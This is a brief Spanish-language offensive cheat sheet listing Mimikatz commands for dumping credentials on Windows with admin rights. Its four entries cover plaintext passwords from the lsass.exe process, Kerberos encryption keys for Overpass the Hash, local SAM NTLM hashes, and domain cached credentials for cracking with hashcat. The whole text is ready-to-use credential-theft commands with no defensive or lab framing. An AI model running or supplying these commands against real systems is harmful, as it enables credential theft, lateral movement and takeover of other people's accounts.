Mimikatz
Note
Los siguiente comandos requieren privilegios de Admin en el sistema.
LSASS
Dump passwords del proceso lsass.exe.
mimikatz sekurlsa::logonpasswords
Kerberos ekeys
Dump Kerberos encryption keys para realizar Overpass the Hash.
mimikatz sekurlsa::ekeys
SAM
Dump NTLM hash del sistema Local.
mimikatz lsadump::sam
Domain Cached Credentials (DCC)
Dump Domain Cached Credentials para intentar crackear el hash usando hashcat.
mimikatz lsadump::cache